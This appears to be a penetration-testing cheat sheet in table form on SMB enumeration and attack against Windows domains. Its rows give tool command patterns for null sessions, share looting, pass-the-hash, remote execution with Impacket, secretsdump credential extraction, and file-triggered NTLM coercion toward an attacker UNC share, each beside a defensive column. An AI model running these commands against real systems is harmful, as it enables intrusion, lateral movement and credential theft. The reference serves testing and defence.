| SMB primitive | What it tells us | Main tools | Command pattern | Offensive value | Defensive focus |
|---|---|---|---|---|---|
| Host probe | SMB service, OS, domain, signing | nxc, nmap | nxc smb 10.10.10.0/24 | Find Windows hosts and relay candidates | 445 scanning, host discovery patterns |
| Signing check | Whether SMB relay to target is blocked | nxc, nmap | nxc smb hosts.txt --gen-relay-list targets.txt | Build relay target list | Require SMB signing |
| Null session | Anonymous SMB/RPC exposure | smbclient, rpcclient, enum4linux-ng | smbclient -N -L //target | Users, groups, shares without creds | Disable anonymous enumeration |
| Guest access | Guest-enabled shares or RPC | smbmap, smbclient, nxc | smbmap -u guest -p '' -H target | Low-friction file access | Disable Guest and audit share ACLs |
| Share enumeration | Share names and permissions | nxc, smbmap, smbclient | nxc smb target -u user -p pass --shares | Find readable and writable data paths | 5140 and 5145 events |
| RPC enumeration | Domain SID, users, groups, password policy | rpcclient, samrdump.py | rpcclient -U '' target -c lsaquery | Username discovery and RID cycling | SAMR restrictions and RPC monitoring |
| File hunting | Interesting files inside shares | Snaffler, PowerHuntShares, smbmap | Snaffler.exe -d ootw.local -s -v data | Credentials, configs, keys, scripts | Sensitive data governance |
| File operations | Upload, download, delete, mount | smbclient, smbmap, mount.cifs | smbclient //target/share -U user%pass -c "get file" | Looting and staging | File auditing and share write review |
| File-triggered NTLM coercion | Whether users can be made to resolve attacker UNC paths from files | Responder, ntlmrelayx.py, crafted files | .library-ms, .lnk, .scf, .url, .svg referencing \\attacker\share | NetNTLMv2 capture or relay source | Writable share review, outbound SMB controls, suspicious file extensions |
| Credential validation | Password, hash, ticket validation | nxc, smbclient, Impacket | nxc smb target -u user -p pass | Find working creds and admin rights | 4624, 4625, lockout telemetry |
| Pass-the-Hash | Authenticate with NTLM hash | nxc, Impacket | nxc smb target -u user -H NTLM | Lateral movement without plaintext | NTLM reduction and admin isolation |
| Kerberos over SMB | Use CIFS ticket or TGT | smbclient, psexec.py, nxc | smbclient -k //host/C$ | Ticket-based SMB access | Kerberos service ticket review |
| Remote execution | Execute command as admin | psexec.py, wmiexec.py, smbexec.py, atexec.py, nxc | wmiexec.py domain/user:pass@target | Host compromise and lateral movement | 7045, 4697, scheduled task and WMI logs |
| Secrets dump | SAM, LSA, NTDS when admin | secretsdump.py, nxc | secretsdump.py domain/user:pass@target | Local or domain credential extraction | LSASS, registry hive, NTDS access |
| SMB staging | Host attacker SMB share | smbserver.py | smbserver.py -smb2support loot . | Payload transfer and UNC coercion testing | Outbound SMB controls |
File-trigger matrix
| Trigger | What causes authentication | Typical placement | Result | Caveat |
|---|---|---|---|---|
.library-ms | Windows library location points to attacker UNC path | Zip, writable share, extracted folder | SMB/WebDAV authentication to attacker | Needs browse, extract, open, or indexing behavior |
.lnk | Shortcut target or icon path references attacker UNC path | Share folder, desktop, archive | SMB authentication to attacker | Extension may be hidden in Explorer |
.scf | Shell icon path references attacker UNC path | Writable share | SMB authentication when folder is browsed | Version-dependent and unreliable on newer servers |
.url | URL shortcut references remote file or icon | Share folder or archive | SMB or HTTP authentication depending on target | Client behavior varies |
.svg or .html | Embedded resource references attacker UNC path | Upload, share, preview path | SMB authentication when rendered or previewed | Depends on renderer and preview settings |
| Office remote template | Template or external relationship points to remote path | Document delivery or share | SMB/WebDAV authentication | Protected View and hardening may block follow-up |
Common shares
| Share | Meaning | Normal access | Offensive value |
|---|---|---|---|
IPC$ | Named pipes and RPC | Authenticated or anonymous depending on policy | RPC enumeration, remote management plumbing |
ADMIN$ | C:\Windows admin share | Local administrators | Service staging, PsExec-style execution |
C$ | System drive admin share | Local administrators | File access, loot, staging |
SYSVOL | Domain policy files | Domain users read | GPO review, scripts, policy artifacts |
NETLOGON | Logon scripts | Domain users read | Scripts, legacy creds, logon behavior |
Users | User profile share | Depends on ACL | Documents, desktop files, configs |
IT | IT operational share | Helpdesk or IT | Scripts, installers, credentials |
Finance | Business data | Department ACL | Sensitive documents |
Backups | Backup data | Backup operators or service accounts | Credential material, database dumps |
Remote execution matrix
| Tool | Transport | Requirement | Output style | Main artifact |
|---|---|---|---|---|
psexec.py | SMB and SCM | Local admin | Interactive shell | Service creation and binary drop |
smbexec.py | SMB and service | Local admin | Semi-interactive | Service creation and script artifacts |
wmiexec.py | SMB plus WMI/DCOM | Local admin and WMI allowed | Command shell | WMI/DCOM activity, SMB output channel |
atexec.py | SMB plus Task Scheduler | Local admin | One-shot output | Scheduled task events |
nxc smb -x | SMB execution backend | Local admin | Command output | Depends on selected exec method |